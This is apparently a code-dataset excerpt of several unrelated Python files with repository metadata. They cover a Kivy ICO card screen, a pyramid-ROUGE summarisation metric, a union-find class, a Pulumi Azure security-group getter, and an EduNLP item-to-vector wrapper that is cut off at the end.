        Handler fired when a category button is clicked: activates the
        pressed button, deactivates the previously pressed one, and
        regenerates the cards for the new category.
        :param obj: the NavigationDrawerIconButton that was pressed.
        :return: None
        """
        if obj.name != 'categories':
            self.upcoming._active = False
            self.categories._active = False
        # last_category_btn is None until the first press.
        try:
            self.last_category_btn._active = False
        except AttributeError:
            pass
        obj._active = True
        self.last_category_btn = obj
        # Remove active state for all items in the categories popup.
        # NOTE(review): this child chain is hard-coded against the popup's
        # widget tree -- verify after any PopupCMContent layout change.
        cat_items_lst = self.popup.children[0].children[0].children[0].children[0].children
        for cat in cat_items_lst:
            cat._active = False
        self.gen_cards()
    def gen_cards(self):
        """
        Fetch ICO project descriptions for the active category and rebuild
        the card list.
        :return: None
        """
        # Default to "Upcoming" before any button has been pressed.
        if self.last_category_btn is None:
            self.upcoming._active = True
        self.grid_box.bind(minimum_height=self.grid_box.setter('height'))
        # The active category name doubles as the request's `cat` parameter.
        cat = self.last_category_btn.text.lower() if self.last_category_btn is not None \
            else self.upcoming.text.lower()
        # Fetch the card payload from the local backend.
        url = 'http://127.0.0.1:8000/ico/icobazaar&cat={}&limit=150&skip=0'.format(cat)
        icos_lst = utils.get_url_content(url)
        # Drop the old cards and reclaim their memory before rebuilding.
        self.grid_box.clear_widgets()
        import gc
        gc.collect()
        for ico_data in icos_lst:
            card = CardIcoBazaar(ico_data)
            self.grid_box.add_widget(card)
        # Cache the categories box widget for other screens.
        # NOTE(review): Cache.register is re-run on every refresh --
        # presumably harmless (re-registering the category); confirm.
        Cache.register('menu_cats_box')
        Cache.append('menu_cats_box', 'cats_box_obj', self.cats_box)
| [
"mkbehforever@gmail.com"
] | mkbehforever@gmail.com |
e5c03cf87ab1e87af4b7366b9c226547f5a60ddd | 4e229e075a3f5e71a33525981fa51fd7878c9715 | /sacrerouge/metrics/pyramid_rouge.py | 6f3230d33d14a5882664976a1c80b37674095cf1 | [] | no_license | CogComp/content-analysis-experiments | 57d68441272c39b687656976d20eddd817c28250 | f6abd72029b6853627ddd191979f105a9385eed7 | refs/heads/master | 2023-06-27T00:29:34.115264 | 2021-08-04T14:36:17 | 2021-08-04T14:36:17 | 305,768,372 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 16,210 | py | import os
import re
from collections import defaultdict
from nltk.stem import PorterStemmer
from typing import Dict, List, Set, Tuple
from sacrerouge.common import DATA_ROOT
from sacrerouge.data import MetricsDict, Pyramid, PyramidAnnotation
from sacrerouge.data.fields import PyramidField, PyramidAnnotationField
from sacrerouge.data.jackknifers import PyramidJackknifer
from sacrerouge.data.types import SummaryType
from sacrerouge.metrics import Metric
from sacrerouge.metrics.interpretable_rouge.util import calculate_maximum_matching
@Metric.register('pyramid-rouge')
class PyramidRouge(Metric):
_non_alphanumeric_regex = re.compile('[^A-Za-z0-9]')
    def __init__(self,
                 use_porter_stemmer: bool = True,
                 remove_stopwords: bool = False,
                 rouge_data_dir: str = f'{DATA_ROOT}/metrics/ROUGE-1.5.5/data') -> None:
        """
        Configure the pyramid-based ROUGE metric.

        Args:
            use_porter_stemmer: stem tokens longer than 3 characters with the
                Porter stemmer, using the WordNet exception lists shipped in
                the ROUGE data directory.
            remove_stopwords: drop tokens found in ROUGE's SMART stopword list.
            rouge_data_dir: directory containing the ROUGE-1.5.5 data files.
        """
        # The metric consumes a peer's pyramid annotation as its only input.
        super().__init__(['pyramid'], jackknifer=PyramidJackknifer())
        self.use_porter_stemmer = use_porter_stemmer
        self.remove_stopwords = remove_stopwords
        # ORIGINAL_ALGORITHM mode -- presumably chosen to mirror the perl
        # ROUGE stemmer; confirm before changing.
        self.stemmer = PorterStemmer(PorterStemmer.ORIGINAL_ALGORITHM)
        self.stemmer_exceptions = self._load_stemmer_exceptions(rouge_data_dir)
        self.stopwords = self._load_stopwords(rouge_data_dir)
def _load_stemmer_exceptions(self, root: str) -> Dict[str, str]:
exceptions = {}
for filename in ['adj.exc', 'adv.exc', 'noun.exc', 'verb.exc']:
file_path = os.path.join(root, 'WordNet-2.0-Exceptions', filename)
with open(file_path, 'r') as f:
for line in f:
# I think there is a bug in the original perl script
# to construct the exceptions database. Some of the lines
# have more than 2 words on them, but the script only
# maps the first to the second, ignoring the third.
columns = line.strip().split()
exceptions[columns[0]] = columns[1]
return exceptions
def _load_stopwords(self, root: str) -> Set[str]:
file_path = os.path.join(root, 'smart_common_words.txt')
return set(open(file_path, 'r').read().splitlines())
def _get_summary_scu_to_offsets(self, annotation: PyramidAnnotation) -> Dict[int, List[Tuple[int, int]]]:
scu_to_offsets = defaultdict(list)
for scu in annotation.scus:
for contributor in scu.contributors:
for part in contributor.parts:
scu_to_offsets[scu.scu_id].append((part.start, part.end))
return scu_to_offsets
def _get_reference_scu_to_offsets(self, pyramid: Pyramid, index: int) -> Dict[int, List[Tuple[int, int]]]:
scu_to_offsets = defaultdict(list)
for scu in pyramid.scus:
for contributor in scu.contributors:
if contributor.summary_index == index:
for part in contributor.parts:
scu_to_offsets[scu.scu_id].append((part.start, part.end))
return scu_to_offsets
def _filter_scu_to_offsets(self,
scu_to_offsets: Dict[int, List[Tuple[int, int]]],
valid_scus: Set[int]) -> Dict[int, List[Tuple[int, int]]]:
return {scu: offsets for scu, offsets in scu_to_offsets.items() if scu in valid_scus}
def _get_scu_intersection(self, annotation: PyramidAnnotation, pyramid: Pyramid, index: int) -> Set[int]:
annotation_scus = annotation.get_scu_id_set()
reference_scus = pyramid.get_scu_id_set(index)
return annotation_scus & reference_scus
    def _tokenize(self, summary: str, scu_to_offsets: Dict[int, List[Tuple[int, int]]]) -> Tuple[List[str], List[Set[int]]]:
        """ROUGE-style tokenization of `summary`, tagging each resulting
        token with the SCUs whose character spans cover its start offset.

        Lowercases, splits on whitespace, strips non-alphanumerics, and
        optionally removes stopwords / applies the Porter stemmer (only to
        subtokens longer than 3 characters, via the WordNet exception map
        first).  Returns (tokens, per-token SCU-id sets).
        """
        summary = summary.lower()
        tokens = []
        index_to_scus = []
        for match in re.finditer(r'\S+', summary):
            token = match.group(0)
            offset = match.start()
            # Sanity check that the regex offset addresses the token text.
            assert summary[offset:offset + len(token)] == token, (summary, offset, token)
            # Even though this token may decompose into smaller tokens
            # (e.g. "it's" -> "it s"), we will still map it to the same offset
            # as a simplifying assumption
            for subtoken in PyramidRouge._non_alphanumeric_regex.sub(' ', token).split():
                if self.remove_stopwords and subtoken in self.stopwords:
                    continue
                if self.use_porter_stemmer and len(subtoken) > 3:
                    # WordNet exceptions override the algorithmic stemmer.
                    if subtoken in self.stemmer_exceptions:
                        subtoken = self.stemmer_exceptions[subtoken]
                    else:
                        subtoken = self.stemmer.stem(subtoken)
                # Find all of the SCUs that overlap with this subtoken
                # (half-open spans: start inclusive, end exclusive).
                scus = set()
                for scu_id, offsets_list in scu_to_offsets.items():
                    for start, end in offsets_list:
                        if start <= offset and offset < end:
                            scus.add(scu_id)
                            break
                tokens.append(subtoken)
                index_to_scus.append(scus)
        return tokens, index_to_scus
    def _compute_standard_rouge(self,
                                summary_tokens: List[str],
                                summary_index_to_scus: List[Set[int]],
                                reference_tokens: List[str],
                                reference_index_to_scus: List[Set[int]]) -> MetricsDict:
        """Standard unigram-overlap ROUGE counts, decomposed into SCU and
        non-SCU matches.

        Note: the return annotation was fixed from `MetricsDict()` (which
        instantiated the type at def time) to the type itself.
        """
        # This is the standard ROUGE calculation except the SCU-based matches are
        # given priority over non-SCU matches to maximize the percentage of the
        # ROUGE score the SCU matches contribute.
        summary_scu_to_indices = self._get_scu_to_indices(summary_index_to_scus)
        reference_scu_to_indices = self._get_scu_to_indices(reference_index_to_scus)
        # Phase 1: candidate matches restricted to token pairs sharing an SCU.
        all_matches = []
        for scu in summary_scu_to_indices.keys():
            summary_indices = summary_scu_to_indices[scu]
            reference_indices = reference_scu_to_indices[scu]
            matches = self._get_matches(summary_tokens, summary_indices,
                                        reference_tokens, reference_indices)
            all_matches.extend(matches)
        num_scu_matches, matching = calculate_maximum_matching(all_matches, return_matching=True)
        # Mark which tokens were matched and are therefore no longer eligible.
        summary_matches = [False] * len(summary_tokens)
        references_matches = [False] * len(reference_tokens)
        for i, j in matching:
            summary_matches[i] = True
            references_matches[j] = True
        # Phase 2: match the remaining tokens without any SCU restriction.
        summary_indices = [i for i in range(len(summary_tokens)) if not summary_matches[i]]
        reference_indices = [i for i in range(len(reference_tokens)) if not references_matches[i]]
        matches = self._get_matches(summary_tokens, summary_indices,
                                    reference_tokens, reference_indices)
        num_non_scu_matches = calculate_maximum_matching(matches)
        # Total intersection is the standard ROUGE unigram match count.
        intersection = num_scu_matches + num_non_scu_matches
        m = MetricsDict({
            'intersection': intersection,
            'num_summary_tokens': len(summary_tokens),
            'num_reference_tokens': len(reference_tokens),
            'num_scu_matches': num_scu_matches,
            'num_non_scu_matches': num_non_scu_matches,
        })
        return m
def _get_scu_to_indices(self, index_to_scus: List[Set[int]]) -> Dict[int, List[int]]:
scu_to_indices = defaultdict(list)
for i, scus in enumerate(index_to_scus):
for scu in scus:
scu_to_indices[scu].append(i)
return scu_to_indices
def _get_matches(self,
summary_tokens: List[str],
summary_indices: List[int],
reference_tokens: List[str],
reference_indices: List[int]) -> List[Tuple[int, int]]:
matches = []
for i in summary_indices:
for j in reference_indices:
if summary_tokens[i] == reference_tokens[j]:
matches.append((i, j, 1.0))
return matches
def _count_tokens_with_scus(self, index_to_scus: List[Set[int]]) -> int:
return sum([1 for scus in index_to_scus if len(scus) > 0])
def _compute_scu_rouge(self,
summary_tokens: List[str],
summary_index_to_scus: List[Set[int]],
reference_tokens: List[str],
reference_index_to_scus: List[Set[int]]) -> MetricsDict:
summary_scu_to_indices = self._get_scu_to_indices(summary_index_to_scus)
reference_scu_to_indices = self._get_scu_to_indices(reference_index_to_scus)
all_matches = []
for scu in summary_scu_to_indices.keys():
summary_indices = summary_scu_to_indices[scu]
reference_indices = reference_scu_to_indices[scu]
matches = self._get_matches(summary_tokens, summary_indices,
reference_tokens, reference_indices)
all_matches.extend(matches)
intersection = calculate_maximum_matching(all_matches)
return MetricsDict({
'intersection': intersection,
'num_summary_tokens': self._count_tokens_with_scus(summary_index_to_scus),
'num_reference_tokens': self._count_tokens_with_scus(reference_index_to_scus)
})
def _get_indices_complement(self, num_tokens: int, indices: List[int]) -> List[int]:
indices = set(indices)
complement = []
for i in range(num_tokens):
if i not in indices:
complement.append(i)
return complement
def _get_non_scu_indices(self, index_to_scus: List[Set[int]]) -> List[int]:
indices = []
for i, scus in enumerate(index_to_scus):
if len(scus) == 0:
indices.append(i)
return indices
def _compute_non_scu_rouge(self,
                           summary_tokens: List[str],
                           summary_index_to_scus: List[Set[int]],
                           reference_tokens: List[str],
                           reference_index_to_scus: List[Set[int]]) -> MetricsDict:
    """Compute ROUGE counts for token pairs that do NOT share an SCU.

    Candidate matches pair (a) each SCU's tokens on one side with tokens
    outside that same SCU on the other side, in both directions, and
    (b) summary tokens with no SCU against reference tokens with no SCU.
    A maximum matching over all candidates gives the intersection;
    denominators are the full token counts.
    """
    summary_scu_to_indices = self._get_scu_to_indices(summary_index_to_scus)
    reference_scu_to_indices = self._get_scu_to_indices(reference_index_to_scus)
    all_matches = []
    # For each SCU, we have to match the summary SCU tokens to any
    # reference token NOT in that SCU and vice versa.
    for scu in summary_scu_to_indices:
        summary_indices = summary_scu_to_indices[scu]
        reference_indices = reference_scu_to_indices[scu]
        summary_complement = self._get_indices_complement(len(summary_tokens), summary_indices)
        reference_complement = self._get_indices_complement(len(reference_tokens), reference_indices)
        matches = self._get_matches(summary_tokens, summary_indices,
                                    reference_tokens, reference_complement)
        all_matches.extend(matches)
        matches = self._get_matches(summary_tokens, summary_complement,
                                    reference_tokens, reference_indices)
        all_matches.extend(matches)
    # Then we have to match any token not part of any SCU in the summary
    # to any token not part of any SCU in the reference.
    summary_indices = self._get_non_scu_indices(summary_index_to_scus)
    reference_indices = self._get_non_scu_indices(reference_index_to_scus)
    matches = self._get_matches(summary_tokens, summary_indices,
                                reference_tokens, reference_indices)
    all_matches.extend(matches)
    intersection = calculate_maximum_matching(all_matches)
    return MetricsDict({
        'intersection': intersection,
        'num_summary_tokens': len(summary_tokens),
        'num_reference_tokens': len(reference_tokens)
    })
def _add_pr(self, metrics: MetricsDict) -> None:
intersection = metrics['intersection']
num_summary_tokens = metrics['num_summary_tokens']
num_reference_tokens = metrics['num_reference_tokens']
precision = 0.0
if num_summary_tokens != 0.0:
precision = intersection / num_summary_tokens * 100
recall = 0.0
if num_reference_tokens != 0.0:
recall = intersection / num_reference_tokens * 100
if precision + recall == 0:
f1 = 0.0
else:
f1 = 2 * (precision * recall) / (precision + recall)
metrics['precision'] = precision
metrics['recall'] = recall
metrics['f1'] = f1
def _run(self,
         summary: SummaryType,
         annotation: PyramidAnnotation,
         pyramid: Pyramid) -> MetricsDict:
    """Score one annotated summary against every reference in the pyramid.

    Accumulates standard / SCU-only / non-SCU ROUGE counts over all
    references, then converts each to precision/recall/F1.  Also reports
    the average number of SCUs shared with a reference.
    """
    summary_all_scus_to_offsets = self._get_summary_scu_to_offsets(annotation)
    # Running totals accumulated across references.
    standard_counts = MetricsDict({'intersection': 0, 'num_summary_tokens': 0, 'num_reference_tokens': 0, 'num_scu_matches': 0, 'num_non_scu_matches': 0})
    scu_counts = MetricsDict({'intersection': 0, 'num_summary_tokens': 0, 'num_reference_tokens': 0})
    non_scu_counts = MetricsDict({'intersection': 0, 'num_summary_tokens': 0, 'num_reference_tokens': 0})
    total_common_scus = 0
    for i, reference in enumerate(pyramid.summaries):
        reference_all_scus_to_offsets = self._get_reference_scu_to_offsets(pyramid, i)
        valid_scus = self._get_scu_intersection(annotation, pyramid, i)
        total_common_scus += len(valid_scus)
        # Take only the SCUs which are common between the summary and reference
        summary_scus_to_offsets = self._filter_scu_to_offsets(summary_all_scus_to_offsets, valid_scus)
        reference_scus_to_offsets = self._filter_scu_to_offsets(reference_all_scus_to_offsets, valid_scus)
        # Tokenize each
        summary_tokens, summary_index_to_scus = self._tokenize(annotation.summary, summary_scus_to_offsets)
        reference_tokens, reference_index_to_scus = self._tokenize(reference, reference_scus_to_offsets)
        # Compute ROUGE
        standard_counts += self._compute_standard_rouge(summary_tokens, summary_index_to_scus,
                                                        reference_tokens, reference_index_to_scus)
        scu_counts += self._compute_scu_rouge(summary_tokens, summary_index_to_scus,
                                              reference_tokens, reference_index_to_scus)
        non_scu_counts += self._compute_non_scu_rouge(summary_tokens, summary_index_to_scus,
                                                      reference_tokens, reference_index_to_scus)
    avg_common_scus = total_common_scus / len(pyramid.summaries)
    # Convert the accumulated counts into precision/recall/F1 in place.
    self._add_pr(standard_counts)
    self._add_pr(scu_counts)
    self._add_pr(non_scu_counts)
    return MetricsDict({
        'common_scus': avg_common_scus,
        'standard-rouge': standard_counts,
        'scu-rouge': scu_counts,
        'non-scu-rouge': non_scu_counts,
    })
def score_multi_all(self,
                    annotations_list: List[List[PyramidAnnotationField]],
                    pyramid_list: List[PyramidField]) -> List[List[MetricsDict]]:
    """Score every annotated summary against its corresponding pyramid.

    Returns one list of MetricsDicts per pyramid, in input order.
    """
    # Just take the data, not the fields
    summaries_list = [[field.summary for field in fields] for fields in annotations_list]
    annotations_list = [[field.annotation for field in fields] for fields in annotations_list]
    pyramid_list = [field.pyramid for field in pyramid_list]
    metrics_lists = []
    # NOTE(review): tqdm is imported locally, presumably to keep it an
    # optional dependency of this module — confirm against project setup.
    from tqdm import tqdm
    for summaries, annotations, pyramid in tqdm(zip(summaries_list, annotations_list, pyramid_list), total=len(annotations_list)):
        metrics_lists.append([])
        for summary, annotation in zip(summaries, annotations):
            metrics_lists[-1].append(self._run(summary, annotation, pyramid))
    return metrics_lists
| [
"danfdeutsch@gmail.com"
] | danfdeutsch@gmail.com |
ad68caba3c69fd1be9e8dfe396a14348fe8f627a | c79a397e81ecefbf66236d763e86a2d4a431449f | /union_find/union_find_2.py | 97d4712392ff9e40b3fce8913eb53141654f497b | [] | no_license | liweiwei1419/Algorithms-Learning-Python | f9acd83598cfa38dbc35e93bd5ff4655a9836867 | 0288097ea6d49d6fc224c3879709ac0d6e9e5b97 | refs/heads/master | 2021-07-12T23:16:29.938315 | 2020-06-17T05:25:14 | 2020-06-17T05:25:14 | 162,683,186 | 12 | 8 | null | null | null | null | UTF-8 | Python | false | false | 1,425 | py | # 并查集第 2 版:设置 parent 数组,查找就变得慢了一些,得一直向上查找;
# 合并的时候,就快了,把其中一个节点的父节点指向另一个节点即可。
# 参考:慕课网:liuyubobobo。
class UnionFind2:
    """Quick-union disjoint-set structure.

    Each element stores a parent pointer; `find` walks up to the root
    (O(tree height)) while `union` simply re-points one root at the other.
    """

    def __init__(self, n):
        # Every element starts as its own root, i.e. n singleton sets.
        self.parent = list(range(n))
        self.count = n  # number of elements

    def find(self, p):
        """Return the root id of the set containing element p."""
        assert 0 <= p < self.count
        root = p
        while root != self.parent[root]:
            root = self.parent[root]
        return root

    def is_connected(self, p, q):
        """Return True iff p and q share a root, i.e. belong to the same set."""
        return self.find(p) == self.find(q)

    def union(self, p, q):
        """Merge the sets containing p and q (no-op if already merged)."""
        root_p = self.find(p)
        root_q = self.find(q)
        if root_p == root_q:
            return
        # Point one root at the other; the choice is arbitrary here.
        self.parent[root_p] = root_q
| [
"121088825@qq.com"
] | 121088825@qq.com |
79151c6482fa1c5ea36b8410d8aa1744130ace4d | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/network/v20200601/get_network_security_group.py | f352aef2112ebad1522df70a471a32ab1c6f2ce5 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,422 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetNetworkSecurityGroupResult',
'AwaitableGetNetworkSecurityGroupResult',
'get_network_security_group',
]
# NOTE: generated by the Pulumi SDK Generator (see file header); prefer
# regenerating over hand-editing.
@pulumi.output_type
class GetNetworkSecurityGroupResult:
    """
    NetworkSecurityGroup resource.

    Read-only invoke result: every field is validated in ``__init__`` and
    exposed through a typed ``@property`` backed by ``pulumi.get``.
    """
    def __init__(__self__, default_security_rules=None, etag=None, flow_logs=None, id=None, location=None, name=None, network_interfaces=None, provisioning_state=None, resource_guid=None, security_rules=None, subnets=None, tags=None, type=None):
        """Type-check each supplied argument and store it via ``pulumi.set``."""
        if default_security_rules and not isinstance(default_security_rules, list):
            raise TypeError("Expected argument 'default_security_rules' to be a list")
        pulumi.set(__self__, "default_security_rules", default_security_rules)
        if etag and not isinstance(etag, str):
            raise TypeError("Expected argument 'etag' to be a str")
        pulumi.set(__self__, "etag", etag)
        if flow_logs and not isinstance(flow_logs, list):
            raise TypeError("Expected argument 'flow_logs' to be a list")
        pulumi.set(__self__, "flow_logs", flow_logs)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if network_interfaces and not isinstance(network_interfaces, list):
            raise TypeError("Expected argument 'network_interfaces' to be a list")
        pulumi.set(__self__, "network_interfaces", network_interfaces)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if resource_guid and not isinstance(resource_guid, str):
            raise TypeError("Expected argument 'resource_guid' to be a str")
        pulumi.set(__self__, "resource_guid", resource_guid)
        if security_rules and not isinstance(security_rules, list):
            raise TypeError("Expected argument 'security_rules' to be a list")
        pulumi.set(__self__, "security_rules", security_rules)
        if subnets and not isinstance(subnets, list):
            raise TypeError("Expected argument 'subnets' to be a list")
        pulumi.set(__self__, "subnets", subnets)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="defaultSecurityRules")
    def default_security_rules(self) -> Sequence['outputs.SecurityRuleResponse']:
        """
        The default security rules of network security group.
        """
        return pulumi.get(self, "default_security_rules")
    @property
    @pulumi.getter
    def etag(self) -> str:
        """
        A unique read-only string that changes whenever the resource is updated.
        """
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter(name="flowLogs")
    def flow_logs(self) -> Sequence['outputs.FlowLogResponse']:
        """
        A collection of references to flow log resources.
        """
        return pulumi.get(self, "flow_logs")
    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        Resource ID.
        """
        return pulumi.get(self, "id")
    @property
    @pulumi.getter
    def location(self) -> Optional[str]:
        """
        Resource location.
        """
        return pulumi.get(self, "location")
    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Resource name.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="networkInterfaces")
    def network_interfaces(self) -> Sequence['outputs.NetworkInterfaceResponse']:
        """
        A collection of references to network interfaces.
        """
        return pulumi.get(self, "network_interfaces")
    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        The provisioning state of the network security group resource.
        """
        return pulumi.get(self, "provisioning_state")
    @property
    @pulumi.getter(name="resourceGuid")
    def resource_guid(self) -> str:
        """
        The resource GUID property of the network security group resource.
        """
        return pulumi.get(self, "resource_guid")
    @property
    @pulumi.getter(name="securityRules")
    def security_rules(self) -> Optional[Sequence['outputs.SecurityRuleResponse']]:
        """
        A collection of security rules of the network security group.
        """
        return pulumi.get(self, "security_rules")
    @property
    @pulumi.getter
    def subnets(self) -> Sequence['outputs.SubnetResponse']:
        """
        A collection of references to subnets.
        """
        return pulumi.get(self, "subnets")
    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Resource type.
        """
        return pulumi.get(self, "type")
class AwaitableGetNetworkSecurityGroupResult(GetNetworkSecurityGroupResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        """Allow ``await`` on an already-resolved result.

        The unreachable ``yield`` below turns this method into a generator
        (which is what ``await`` requires); execution falls straight
        through and returns a plain result copy without suspending.
        """
        if False:
            yield self
        return GetNetworkSecurityGroupResult(
            default_security_rules=self.default_security_rules,
            etag=self.etag,
            flow_logs=self.flow_logs,
            id=self.id,
            location=self.location,
            name=self.name,
            network_interfaces=self.network_interfaces,
            provisioning_state=self.provisioning_state,
            resource_guid=self.resource_guid,
            security_rules=self.security_rules,
            subnets=self.subnets,
            tags=self.tags,
            type=self.type)
def get_network_security_group(expand: Optional[str] = None,
                               network_security_group_name: Optional[str] = None,
                               resource_group_name: Optional[str] = None,
                               opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkSecurityGroupResult:
    """
    NetworkSecurityGroup resource.

    Invokes the Azure API (version 2020-06-01) to fetch a network security
    group and returns an awaitable result object.

    :param str expand: Expands referenced resources.
    :param str network_security_group_name: The name of the network security group.
    :param str resource_group_name: The name of the resource group.
    """
    __args__ = dict()
    __args__['expand'] = expand
    __args__['networkSecurityGroupName'] = network_security_group_name
    __args__['resourceGroupName'] = resource_group_name
    # Default the invoke options and pin them to this SDK's version.
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:network/v20200601:getNetworkSecurityGroup', __args__, opts=opts, typ=GetNetworkSecurityGroupResult).value
    return AwaitableGetNetworkSecurityGroupResult(
        default_security_rules=__ret__.default_security_rules,
        etag=__ret__.etag,
        flow_logs=__ret__.flow_logs,
        id=__ret__.id,
        location=__ret__.location,
        name=__ret__.name,
        network_interfaces=__ret__.network_interfaces,
        provisioning_state=__ret__.provisioning_state,
        resource_guid=__ret__.resource_guid,
        security_rules=__ret__.security_rules,
        subnets=__ret__.subnets,
        tags=__ret__.tags,
        type=__ret__.type)
| [
"noreply@github.com"
] | MisinformedDNA.noreply@github.com |
bef751699b606c824c94c94c6c1eafcd6fb8ca0d | d6760033989f2abbd94d68651eb54a8aac4ac61f | /EduNLP/I2V/i2v.py | c997537646c7d0274d0238f22d02aaf311c0d5fe | [
"Apache-2.0"
] | permissive | astrojuanlu/EduNLP | ba636cf39adc1580d0c2f3bf6f0646139f406c72 | 51bbf2e20828f12eed2f9cd8d176c8650ec357ef | refs/heads/master | 2023-07-16T23:27:38.606705 | 2021-08-13T11:38:46 | 2021-08-13T11:38:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,967 | py | # coding: utf-8
# 2021/8/1 @ tongshiwei
import json
from EduNLP.constant import MODEL_DIR
from ..Vector import T2V, get_pretrained_t2v as get_t2v_pretrained_model
from ..Tokenizer import Tokenizer, get_tokenizer
from EduNLP import logger
__all__ = ["I2V", "D2V", "get_pretrained_i2v"]
class I2V(object):
    """
    Item-to-vector wrapper: composes a tokenizer with a token-to-vector model.

    Parameters
    ----------
    tokenizer: str
        the tokenizer name
    t2v: str
        the name of token2vector model
    args:
        the parameters passed to t2v
    tokenizer_kwargs: dict
        the parameters passed to tokenizer
    pretrained_t2v: bool
        if True, download/load the pretrained t2v model named `t2v`
    kwargs:
        the parameters passed to t2v
    """
    def __init__(self, tokenizer, t2v, *args, tokenizer_kwargs: dict = None, pretrained_t2v=False, **kwargs):
        self.tokenizer: Tokenizer = get_tokenizer(tokenizer, **tokenizer_kwargs if tokenizer_kwargs is not None else {})
        if pretrained_t2v:
            logger.info("Use pretrained t2v model %s" % t2v)
            self.t2v = get_t2v_pretrained_model(t2v, kwargs.get("model_dir", MODEL_DIR))
        else:
            self.t2v = T2V(t2v, *args, **kwargs)
        # Construction parameters are kept so `save`/`load` can round-trip
        # this object through a JSON config file.
        self.params = {
            "tokenizer": tokenizer,
            "tokenizer_kwargs": tokenizer_kwargs,
            "t2v": t2v,
            "args": args,
            "kwargs": kwargs,
            "pretrained_t2v": pretrained_t2v
        }
    def __call__(self, items, *args, **kwargs):
        """Alias for `infer_vector`."""
        return self.infer_vector(items, *args, **kwargs)
    def tokenize(self, items, indexing=True, padding=False, key=lambda x: x, *args, **kwargs) -> list:
        """Tokenize `items`; `key` extracts the text from each item.

        NOTE(review): `indexing`/`padding` are accepted but not forwarded
        to the tokenizer here — confirm intended behavior.
        """
        return self.tokenizer(items, key=key, *args, **kwargs)
    def infer_vector(self, items, tokenize=True, indexing=False, padding=False, key=lambda x: x, *args,
                     **kwargs) -> tuple:
        """Return (item_vector, token_vectors); implemented by subclasses."""
        raise NotImplementedError
    def infer_item_vector(self, tokens, *args, **kwargs) -> ...:
        """Return only the whole-item vector."""
        return self.infer_vector(tokens, *args, **kwargs)[0]
    def infer_token_vector(self, tokens, *args, **kwargs) -> ...:
        """Return only the per-token vectors."""
        return self.infer_vector(tokens, *args, **kwargs)[1]
    def save(self, config_path, *args, **kwargs):
        """Persist the construction parameters as a JSON config file.

        NOTE(review): assumes `args`/`kwargs` are JSON-serializable.
        """
        with open(config_path, "w", encoding="utf-8") as wf:
            json.dump(self.params, wf, ensure_ascii=False, indent=2)
    @classmethod
    def load(cls, config_path, *args, **kwargs):
        """Rebuild an I2V instance from a config file written by `save`."""
        with open(config_path, encoding="utf-8") as f:
            params: dict = json.load(f)
            tokenizer = params.pop("tokenizer")
            t2v = params.pop("t2v")
            args = params.pop("args")
            kwargs = params.pop("kwargs")
            # Remaining keys (tokenizer_kwargs, pretrained_t2v) ride along
            # with the stored kwargs.
            params.update(kwargs)
            return cls(tokenizer, t2v, *args, **params)
    @classmethod
    def from_pretrained(cls, name, model_dir=MODEL_DIR, *args, **kwargs):
        """Construct from a named pretrained model; implemented by subclasses."""
        raise NotImplementedError
    @property
    def vector_size(self):
        """Dimensionality of the underlying t2v embeddings."""
        return self.t2v.vector_size
class D2V(I2V):
    """I2V backed by a doc2vec-style model: produces a whole-item vector only."""
    def infer_vector(self, items, tokenize=True, indexing=False, padding=False, key=lambda x: x, *args,
                     **kwargs) -> tuple:
        """Return (item_vector, None); d2v has no per-token vectors."""
        tokens = self.tokenize(items, return_token=True, key=key) if tokenize is True else items
        return self.t2v(tokens, *args, **kwargs), None
    @classmethod
    def from_pretrained(cls, name, model_dir=MODEL_DIR, *args, **kwargs):
        """Build a D2V around the pretrained t2v model called `name`."""
        return cls("text", name, pretrained_t2v=True, model_dir=model_dir)
# Registry of downloadable pretrained models:
# name -> [I2V subclass to instantiate, pretrained t2v model name].
MODELS = {
    "d2v_all_256": [D2V, "d2v_all_256"],
    "d2v_sci_256": [D2V, "d2v_sci_256"],
    "d2v_eng_256": [D2V, "d2v_eng_256"],
    "d2v_lit_256": [D2V, "d2v_lit_256"],
}
def get_pretrained_i2v(name, model_dir=MODEL_DIR):
    """
    Build an I2V instance from a pretrained model registered in MODELS.

    Parameters
    ----------
    name: str
        registry key of the pretrained model
    model_dir: str
        directory where the pretrained model files live

    Returns
    -------
    i2v model: I2V
    """
    if name not in MODELS:
        raise KeyError(
